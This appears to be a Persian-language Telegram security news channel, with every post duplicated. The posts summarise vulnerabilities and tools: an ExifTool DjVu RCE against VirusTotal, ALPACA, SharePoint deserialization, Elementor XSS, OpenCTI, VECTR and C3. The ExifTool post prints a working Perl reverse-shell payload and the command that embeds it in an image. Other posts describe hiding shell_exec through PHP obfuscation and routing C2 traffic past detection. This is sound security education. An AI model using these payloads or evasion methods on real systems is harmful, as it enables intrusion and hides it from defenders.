#CVE-2021-22204 #VirusTotal #RCE
مثل اینکه سرویس آنلاین VirusTotal از ابزار Exiftool استفاده میکرده که برای این ابزار، در خصوص پارس فایل فرمت DjVu یک آسیب پذیری RCE با شناسه CVE-2021-22204 ثبت شده بوده که بدلیل بروز رسانی نکردن ابزار، بر روی سرور VirusTotal این وبسایت مورد نفوذ قرار گرفته است.
$
@Unk9vvN
مثل اینکه سرویس آنلاین VirusTotal از ابزار Exiftool استفاده میکرده که برای این ابزار، در خصوص پارس فایل فرمت DjVu یک آسیب پذیری RCE با شناسه CVE-2021-22204 ثبت شده بوده که بدلیل بروز رسانی نکردن ابزار، بر روی سرور VirusTotal این وبسایت مورد نفوذ قرار گرفته است.
(metadata "\c${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(9999,inet_aton('localhost')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};#")
کاری که فایل بارگزاری شده انجام میدهد این است که ما یک تگ جدید روی فایل با نام HasselbladExif و بایت های 0xc51b بنویسیم تا آن را در فایل جدید خود شناسایی کنیم. سپس میتوانیم آن را در داخل هر فایلی قرار دهیم. در نهایت فایل آماده djvu, را با فایل فرمت دیگری مثل JPEG ترکیب میکنیم که اینبار بواسطه Exiftool انجام میشه.$
exiftool -config configfile '-HasselbladExif<=exploit.djvu' hacker.jpg
https://www.cysrc.com/blog/virus-total-blog/@Unk9vvN
#ALPACA (Application Layer Protocol Confusion Attack)
در مقاله ای از دانشگاه Ruhr و Munster یک ارائه مطرح شده مبنی بر ALPACA که مشخص میکنه بواسطه ایجاد یک مهاجم مرد میانی اجازه میدهد تا ترافیک TLS را به یک نقطه پایانی سرویس TLS دیگر در آدرس IP و یا پورت دیگری هدایت کند.
به عنوان مثال، اگر زیردامنهها یک گواهی نامه عام را به اشتراک بگذارند، مهاجم میتواند ترافیک را از یک زیر دامنه به زیر دامنه دیگر هدایت کند و در نتیجه یک جلسه TLS معتبر ایجاد شود. این امر احراز هویت TLS را نقض میکند و حملات متقابل پروتکل ممکن است در مواردی که رفتار یک سرویس ممکن است امنیت سرویس دیگر را در لایه برنامه به خطر بیندازد.
یک مطالعه موردی سیستماتیک روی سرورهای وب انجام شده، درخواستهای HTTPS را از مرورگر وب قربانی به سرورهای SMTP، IMAP، POP3 و FTP هدایت میشود و ما نشان داده میشه که در سناریو های واقعی، مهاجم میتواند کوکیهای جلسه و سایر دادههای کار کاربر خصوصی را استخراج کند یا جاوا اسکریپت دلخواه را در زمینه وب سرور آسیبپذیر اجرا کند، بنابراین TLS و امنیت برنامه وب را دور میزند.
Reference
@Unk9vvN
در مقاله ای از دانشگاه Ruhr و Munster یک ارائه مطرح شده مبنی بر ALPACA که مشخص میکنه بواسطه ایجاد یک مهاجم مرد میانی اجازه میدهد تا ترافیک TLS را به یک نقطه پایانی سرویس TLS دیگر در آدرس IP و یا پورت دیگری هدایت کند.
به عنوان مثال، اگر زیردامنهها یک گواهی نامه عام را به اشتراک بگذارند، مهاجم میتواند ترافیک را از یک زیر دامنه به زیر دامنه دیگر هدایت کند و در نتیجه یک جلسه TLS معتبر ایجاد شود. این امر احراز هویت TLS را نقض میکند و حملات متقابل پروتکل ممکن است در مواردی که رفتار یک سرویس ممکن است امنیت سرویس دیگر را در لایه برنامه به خطر بیندازد.
یک مطالعه موردی سیستماتیک روی سرورهای وب انجام شده، درخواستهای HTTPS را از مرورگر وب قربانی به سرورهای SMTP، IMAP، POP3 و FTP هدایت میشود و ما نشان داده میشه که در سناریو های واقعی، مهاجم میتواند کوکیهای جلسه و سایر دادههای کار کاربر خصوصی را استخراج کند یا جاوا اسکریپت دلخواه را در زمینه وب سرور آسیبپذیر اجرا کند، بنابراین TLS و امنیت برنامه وب را دور میزند.
Reference
@Unk9vvN
#SharePoint #Deserialize #Vulnerability
نمونه ای از آسیب پذیری Deserialize در Functionality های پارس مقادیر sk یا Session Key که منجر به اجرای کد از راه دور میشود،
این آسیب پذیری روی نسخه های ۲۰۱۹ ، ۲۰۱۶ و ۲۰۱۳ وجود داشته و با شناسه CVE-2022-22005 ثبت شده است، فرایند اعمال وصله مایکروسافت در نسخه های قبلی دور زده شده و شروطی که برای تصدیق عدم وجود Object های خطرناک به درستی طراحی نشده است،
مدت دو ساله که محققین تست نفوذ وب تمرکز خودشون رو در خصوص دور زدن فیلترینگ ها و اعمال تصدیق های مایکروسافت بر روی آسیب پذیری هایی مانند Deserialization و SSRF و Directory Traversal گذاشته اند و اغلب موفق هم بوده اند،
یکی از عوامل موفقیت و جذابیت این آسیب پذیری ها، دسترسی به منابع کد سرویس های مایکروسافتی بوده و همچنین ماهیت این آسیب پذیری ها در حملات #APT بسیار مهم و نقش آفرین است...
https://hnd3884.github.io/posts/cve-2022-22005-microsoft-sharepoint-RCE/
@Unk9vvN
نمونه ای از آسیب پذیری Deserialize در Functionality های پارس مقادیر sk یا Session Key که منجر به اجرای کد از راه دور میشود،
این آسیب پذیری روی نسخه های ۲۰۱۹ ، ۲۰۱۶ و ۲۰۱۳ وجود داشته و با شناسه CVE-2022-22005 ثبت شده است، فرایند اعمال وصله مایکروسافت در نسخه های قبلی دور زده شده و شروطی که برای تصدیق عدم وجود Object های خطرناک به درستی طراحی نشده است،
مدت دو ساله که محققین تست نفوذ وب تمرکز خودشون رو در خصوص دور زدن فیلترینگ ها و اعمال تصدیق های مایکروسافت بر روی آسیب پذیری هایی مانند Deserialization و SSRF و Directory Traversal گذاشته اند و اغلب موفق هم بوده اند،
یکی از عوامل موفقیت و جذابیت این آسیب پذیری ها، دسترسی به منابع کد سرویس های مایکروسافتی بوده و همچنین ماهیت این آسیب پذیری ها در حملات #APT بسیار مهم و نقش آفرین است...
https://hnd3884.github.io/posts/cve-2022-22005-microsoft-sharepoint-RCE/
@Unk9vvN
#Elementor #XSS #Reflected #Vulnerability
مدت 4 ماهه که یک آسیب پذیری برای افزونه Elementor ثبت شده که از نسخه 1.5.0 تا 3.1.4 امکان رخدادش وجود داره.
این آسیب پذیری از نوع Reflected بوده که بصورت Unauthenticated امکان تزریق کد جاوا اسکریپت رو خواهد داشت، منطقه آسیب پذیر پارامتر settings در
آسیب پذیری در بخش یک switch قرار داره که میبایست نوع داده دریافتی رو مشخص کنه، در switch قرار داده شده نوع options یا میبایست video باشه یا image و یا slideshow ، اگر هیچ کدام اینها نبود بصورت default نوع محتوای options رو html در نظر خواهد گرفت که این یعنی تزریق کد جاوا اسکریپتی!
روش های بهره برداری از این نوع آسیب پذیری ها قالبا مبتنی بر مهندسی اجتماعی میتونه باشه، اگر مهاجم ایمیل فیشینگ مناسبی رو تهیه کرده باشه و بواسطه تحریک ادمین وبسایت، یک کلیک لینک بدزده، میتونه حمله CSRF خودش رو مبنی بر اضافه کردن ادمین ترتیب بده.
جالبه که این آسیب پذیری 4 ماهه روی برخی سایت های فعال در حوزه امنیت هم بچشم میخوره.
@Unk9vvN
مدت 4 ماهه که یک آسیب پذیری برای افزونه Elementor ثبت شده که از نسخه 1.5.0 تا 3.1.4 امکان رخدادش وجود داره.
این آسیب پذیری از نوع Reflected بوده که بصورت Unauthenticated امکان تزریق کد جاوا اسکریپت رو خواهد داشت، منطقه آسیب پذیر پارامتر settings در
#elementor-action:action=lightbox&settings= هستش که مقدار Base64 شده دریافت میکنه و نوع محتوا JSON هستش،آسیب پذیری در بخش یک switch قرار داره که میبایست نوع داده دریافتی رو مشخص کنه، در switch قرار داده شده نوع options یا میبایست video باشه یا image و یا slideshow ، اگر هیچ کدام اینها نبود بصورت default نوع محتوای options رو html در نظر خواهد گرفت که این یعنی تزریق کد جاوا اسکریپتی!
روش های بهره برداری از این نوع آسیب پذیری ها قالبا مبتنی بر مهندسی اجتماعی میتونه باشه، اگر مهاجم ایمیل فیشینگ مناسبی رو تهیه کرده باشه و بواسطه تحریک ادمین وبسایت، یک کلیک لینک بدزده، میتونه حمله CSRF خودش رو مبنی بر اضافه کردن ادمین ترتیب بده.
جالبه که این آسیب پذیری 4 ماهه روی برخی سایت های فعال در حوزه امنیت هم بچشم میخوره.
@Unk9vvN
#WinAPI #Threat_Hunting
یکی از مواردی که در بحث شکار تهدید میبایست ارزیابی و بررسی شود، مبحث استفاده ی از WinAPI سیستم عامل ویندوز میباشد،
در یک زنجیره حمله قالبا برای انجام ماموریت های بهره برداری یا ارتقاء سطح دسترسی و همچنین مواردی مانند ناشناس ماندن در مقابل مکانیزم های شناساسی کننده باشد.
در این خصوص یک وبسایت وجود داره به نام malapi.io که بسیاری از توابع API سیستم عامل، به شما نمایش میدهد و پتانسیل این توابع هم مطرح شده است که در کدام از مقطع یک حمله APT بکار گرفته شود.
برای مثال تابع GetModuleHandleW برای بکارگیری در فرآیند فراخوانی بارگیری شده باشد. این تابع اغلب همراه با GetProcAddress برای بازیابی پویا آدرس یک تابع برای اهداف فرار از شناسایی استفاده می شود.
malapi.io
@Unk9vvN
یکی از مواردی که در بحث شکار تهدید میبایست ارزیابی و بررسی شود، مبحث استفاده ی از WinAPI سیستم عامل ویندوز میباشد،
در یک زنجیره حمله قالبا برای انجام ماموریت های بهره برداری یا ارتقاء سطح دسترسی و همچنین مواردی مانند ناشناس ماندن در مقابل مکانیزم های شناساسی کننده باشد.
در این خصوص یک وبسایت وجود داره به نام malapi.io که بسیاری از توابع API سیستم عامل، به شما نمایش میدهد و پتانسیل این توابع هم مطرح شده است که در کدام از مقطع یک حمله APT بکار گرفته شود.
برای مثال تابع GetModuleHandleW برای بکارگیری در فرآیند فراخوانی بارگیری شده باشد. این تابع اغلب همراه با GetProcAddress برای بازیابی پویا آدرس یک تابع برای اهداف فرار از شناسایی استفاده می شود.
malapi.io
@Unk9vvN
#OpenCTI #Cyber #Threat #Intelligence
ابزار OpenCTI یک پلتفرم منبع باز است که به سازمان ها امکان میدهد تیم های شکار تهدید، اکتشافات خود را در قالب IoC های طراحی شده با یکی دیگر به اشتراک بگذارند. این به منظور ایمن سازی سریع تمامی سازمان های مشارکت کننده است.
هدف ایجاد یک ابزار جامع است که به کاربران اجازه میدهد تا از اطلاعات فنی مانند (TTP و IoC) و غیر... استفاده کنند و در عین حال هر قسمت از اطلاعات را به SOC اصلی خود مرتبط کنند مانند (MISP و غیره)،همچنین این ماتریس تکنیکی و تاکتیکی مبتنی بر چهارچوب MITRE ATT&CK هماهنگ خواهند بود.
ساختار داده ها با استفاده از فرم و استانداردهای STIX2 طراحی شده است. در این ابزار از تکنولوژی هایی از جمله GraphQL API و UX بهره برده شده است. همچنین OpenCTI را میتوان با ابزارها و برنامه های کاربردی دیگری مانند MISP، TheHive، MITRE ATT&CK و ... ادغام کرد.
https://github.com/OpenCTI-Platform/opencti
@Unk9vvN
ابزار OpenCTI یک پلتفرم منبع باز است که به سازمان ها امکان میدهد تیم های شکار تهدید، اکتشافات خود را در قالب IoC های طراحی شده با یکی دیگر به اشتراک بگذارند. این به منظور ایمن سازی سریع تمامی سازمان های مشارکت کننده است.
هدف ایجاد یک ابزار جامع است که به کاربران اجازه میدهد تا از اطلاعات فنی مانند (TTP و IoC) و غیر... استفاده کنند و در عین حال هر قسمت از اطلاعات را به SOC اصلی خود مرتبط کنند مانند (MISP و غیره)،همچنین این ماتریس تکنیکی و تاکتیکی مبتنی بر چهارچوب MITRE ATT&CK هماهنگ خواهند بود.
ساختار داده ها با استفاده از فرم و استانداردهای STIX2 طراحی شده است. در این ابزار از تکنولوژی هایی از جمله GraphQL API و UX بهره برده شده است. همچنین OpenCTI را میتوان با ابزارها و برنامه های کاربردی دیگری مانند MISP، TheHive، MITRE ATT&CK و ... ادغام کرد.
https://github.com/OpenCTI-Platform/opencti
@Unk9vvN
#VECTR #PurpleTeam #Simulation
همونطور که میدونید، تیم های بنفش، به تیم هایی گفته میشه که در اصل مختصص تیم قرمز هستند و همچنین تخصص های تیم آبی رو هم فرا گرفته اند برای عملیات شکار تهدید، بازبینی مکانیزم های دفاعی و تحلیل رفتار های تکنیکی تاکتیکی مهاجمان.
در این خصوص یه پلتفرمی وجود داره با نام VECTR که میتونه با استفاده از پتانسیل شبیه سازانی همچون Atomic-RedTeam ، این امکان رو فراهم کنه که متخصصین امنیت دفاعی سعی در شبیه سازی رفتار تکنیکی تاکتیکی مهاجمین #APT کنند، البته طبق مستندات MITRE ATT&CK و با استفاده از این شبیه سازی، بیان ببینن مکانیزم های دفاعی سیستم عامل میتونه نواقصی رو در فرایند تشخیص و محافظت داشته باشه یا نه.
همچنین در کنار این شبیه سازی شما میتونید پایش شاخصه های حمله رو هم در سیستم عامل داشته و چارت آماری دقیق و کاملی رو از این پلتفرم دریافت نمایید.
https://docs.vectr.io/Installation/
https://github.com/SecurityRiskAdvisors/VECTR
@Unk9vvN
همونطور که میدونید، تیم های بنفش، به تیم هایی گفته میشه که در اصل مختصص تیم قرمز هستند و همچنین تخصص های تیم آبی رو هم فرا گرفته اند برای عملیات شکار تهدید، بازبینی مکانیزم های دفاعی و تحلیل رفتار های تکنیکی تاکتیکی مهاجمان.
در این خصوص یه پلتفرمی وجود داره با نام VECTR که میتونه با استفاده از پتانسیل شبیه سازانی همچون Atomic-RedTeam ، این امکان رو فراهم کنه که متخصصین امنیت دفاعی سعی در شبیه سازی رفتار تکنیکی تاکتیکی مهاجمین #APT کنند، البته طبق مستندات MITRE ATT&CK و با استفاده از این شبیه سازی، بیان ببینن مکانیزم های دفاعی سیستم عامل میتونه نواقصی رو در فرایند تشخیص و محافظت داشته باشه یا نه.
همچنین در کنار این شبیه سازی شما میتونید پایش شاخصه های حمله رو هم در سیستم عامل داشته و چارت آماری دقیق و کاملی رو از این پلتفرم دریافت نمایید.
https://docs.vectr.io/Installation/
https://github.com/SecurityRiskAdvisors/VECTR
@Unk9vvN
#Cybersecurity #Knowledge Based Teams
یکی از تیم های موفق در شرق آسیا، تیم theori.io است که تمرکز خود را بر کشف آسیب پذیری از هسته سیستم عامل ها و همچنین مرورگرها گذاشته است.
بد نیست به بهانه بررسی نوع عملکرد این قبیل تیم ها که به معنی واقعی کلمه دانش بنیان هستند و نوع خدمات دهی منحصر به فردی را داشته که بسیار کار آمد و نتیجه بخش تر از دلالی محصولات خارجی است، بررسی کنیم.
نوع سرویس دهی این قبیل تیم ها که در دنیا کم هم نیستند، به این صورت است که متمرکز بر یک بخش یا چند بخش مرتبط با حوزه امنیت تهاجمی، سعی بر پوشش علمی نقاط نفوذ سطح پیشرفته میکنند،
همانطور که میدانید محصولات دفاعی هنوز در مقابل روش شناسی های روز دنیا مانند ایجاد دسترسی مبتنی بر آسیب پذیری مرورگر یا فایل فرمت، دفاع موثری جز رفتار شناسی (IoB) ندیده اند، که قالبا با مبهم سازی سطح باینری یا زبان های سطح بالا مانند Javascript دوره خورده است.
اینکه یک سازمان بصورت خاص خدمات شبیه سازی حملات سطح پیشرفته (تیم قرمز) را پیاده سازی نماید یک عامل موثر همانند خدمات تست نفوذ بوده است، که در کنار خدمات امنیت دفاعی مورد بهره برداری قرار میگیرید.
@Unk9vvN
یکی از تیم های موفق در شرق آسیا، تیم theori.io است که تمرکز خود را بر کشف آسیب پذیری از هسته سیستم عامل ها و همچنین مرورگرها گذاشته است.
بد نیست به بهانه بررسی نوع عملکرد این قبیل تیم ها که به معنی واقعی کلمه دانش بنیان هستند و نوع خدمات دهی منحصر به فردی را داشته که بسیار کار آمد و نتیجه بخش تر از دلالی محصولات خارجی است، بررسی کنیم.
نوع سرویس دهی این قبیل تیم ها که در دنیا کم هم نیستند، به این صورت است که متمرکز بر یک بخش یا چند بخش مرتبط با حوزه امنیت تهاجمی، سعی بر پوشش علمی نقاط نفوذ سطح پیشرفته میکنند،
همانطور که میدانید محصولات دفاعی هنوز در مقابل روش شناسی های روز دنیا مانند ایجاد دسترسی مبتنی بر آسیب پذیری مرورگر یا فایل فرمت، دفاع موثری جز رفتار شناسی (IoB) ندیده اند، که قالبا با مبهم سازی سطح باینری یا زبان های سطح بالا مانند Javascript دوره خورده است.
اینکه یک سازمان بصورت خاص خدمات شبیه سازی حملات سطح پیشرفته (تیم قرمز) را پیاده سازی نماید یک عامل موثر همانند خدمات تست نفوذ بوده است، که در کنار خدمات امنیت دفاعی مورد بهره برداری قرار میگیرید.
@Unk9vvN
#Obfuscation #PHP
یکی از روش های مبهم سازی کد PHP که کمتر مورد توجه قرار گرفته است صدا زدن توابع به صورت String می باشد. در عکس اول یک کد با همین روش مبهم سازی شده، در این کد
@Unk9vvN
یکی از روش های مبهم سازی کد PHP که کمتر مورد توجه قرار گرفته است صدا زدن توابع به صورت String می باشد. در عکس اول یک کد با همین روش مبهم سازی شده، در این کد
shell_exec اول base64 شده و در سه متغیر a، b، c تعریف شده است، در متغیر z این موارد کنار هم قرار گرفته اند و درون متغیر z مقدار c2hlbGxfZXhlYw را دریافت می کنیم که base64 شده تابع shell_exec می باشد. در متغیر f مقدار base64_decode که ما بین آن چندین بار As- تکرار شده، در خط آخر با استفاده از str_replace مقدار As- را از متغیر f حذف می کنیم و نتیجه این کار کد زیر می شودecho base64_decode($z)("dir");
با decode کردن مقدار z کد تبدیل به شکل زیر می شودecho "shell_exec"("dir");
این تنها دو نمونه ساده از این نوع مبهم سازی است.@Unk9vvN
This media is not supported in your browser
VIEW IN TELEGRAM
#Critical #Bug in #Instagram
یه محقق هندی تونسته یک آسیب پذیری Broken Authorization پیدا کنه و بدلیل عدم تصدیق صحیح API اینستاگرام که از نوع GraphQL است، مهاجم میتواند با استفاده از جایگزینی ID مربوط به پارامتر
این آسیب پذیری 49500 دلار جایزه در بر داشته که شرکت Facebook به شکارچی پرداخت کرده است، این نکته لازم به ذکر که بدونیم غالبا فرایند های Authentication و Authorization در API ها دارای چالش و آسیب پذیری بوده است، از این روی توجه به تکنیک های تست نفوذ در این منطقه، موردی مناسب برای کشف آسیب پذیری است.
https://medium.com/@root.n33r4j/how-i-found-a-critical-bug-in-instagram-and-got-49500-bounty-from-facebook-626ff2c6a853
@Unk9vvN
یه محقق هندی تونسته یک آسیب پذیری Broken Authorization پیدا کنه و بدلیل عدم تصدیق صحیح API اینستاگرام که از نوع GraphQL است، مهاجم میتواند با استفاده از جایگزینی ID مربوط به پارامتر
clips_media_id با media_id یک پست دیگر، یک ویدیو را در صفحه قربانی بارگزاری کند و حتی تصویر thumbnail رو هم در پست هدف قرار بدهد.این آسیب پذیری 49500 دلار جایزه در بر داشته که شرکت Facebook به شکارچی پرداخت کرده است، این نکته لازم به ذکر که بدونیم غالبا فرایند های Authentication و Authorization در API ها دارای چالش و آسیب پذیری بوده است، از این روی توجه به تکنیک های تست نفوذ در این منطقه، موردی مناسب برای کشف آسیب پذیری است.
https://medium.com/@root.n33r4j/how-i-found-a-critical-bug-in-instagram-and-got-49500-bounty-from-facebook-626ff2c6a853
@Unk9vvN
#C3 #Breaking #Network #Segregation
یکی از دغدغه تیم های قرمز بحث برقراری ارتباط با CnC است که بصورت ناشناس انجام بشه و همین ناشناسی موجب عدم شکار حمله توسط تیم های شکارچی باشه
در همین راستا محققین شرکت F-Secure یک ارائه دادن در BlackHat 2021 تحت عنوان نحوه Breaking شبکه در خط فرمان تولیدی خودشون با نام C3، این خط فرمان قراره از DCOM های خود سیستم عامل استفاده کنه در خصوص انجام فرامین خط فرمان C3 در پوشش یک DCOM صحیح سیستم مانند سرویس Printer و درایور Print Spooler
همونطور که در تصاویر میتونید ببینید، خط فرمان بواسطه یک ارتباط مبتنی بر Slack اقدام به برقراری ارتباط کرده و بواسطه کانالی که خط فرمان طراحی کرده اقدام به ارتباط با RPC میکنه، در نتیجه دستورات اول به RPC پرینتر داده شده و بعد به C3
اتفاقی که اینجا می افته اینه که چون پردازش مستقیمی برای برقراری ارتباط از طرف C3 انجام نشده و این ارتباط بواسطه یک واسط صحیح در سیستم بوده، تیم SOC دیگه رویدادی که جلب توجه کنه براش، نخواهد دید و بنوعی دور میخوره...
سناریو های بعدی مطرح شده در مقاله رو خودتون میتوید در اینجا مطالعه بفرماید.
@Unk9vvN
یکی از دغدغه تیم های قرمز بحث برقراری ارتباط با CnC است که بصورت ناشناس انجام بشه و همین ناشناسی موجب عدم شکار حمله توسط تیم های شکارچی باشه
در همین راستا محققین شرکت F-Secure یک ارائه دادن در BlackHat 2021 تحت عنوان نحوه Breaking شبکه در خط فرمان تولیدی خودشون با نام C3، این خط فرمان قراره از DCOM های خود سیستم عامل استفاده کنه در خصوص انجام فرامین خط فرمان C3 در پوشش یک DCOM صحیح سیستم مانند سرویس Printer و درایور Print Spooler
همونطور که در تصاویر میتونید ببینید، خط فرمان بواسطه یک ارتباط مبتنی بر Slack اقدام به برقراری ارتباط کرده و بواسطه کانالی که خط فرمان طراحی کرده اقدام به ارتباط با RPC میکنه، در نتیجه دستورات اول به RPC پرینتر داده شده و بعد به C3
اتفاقی که اینجا می افته اینه که چون پردازش مستقیمی برای برقراری ارتباط از طرف C3 انجام نشده و این ارتباط بواسطه یک واسط صحیح در سیستم بوده، تیم SOC دیگه رویدادی که جلب توجه کنه براش، نخواهد دید و بنوعی دور میخوره...
سناریو های بعدی مطرح شده در مقاله رو خودتون میتوید در اینجا مطالعه بفرماید.
@Unk9vvN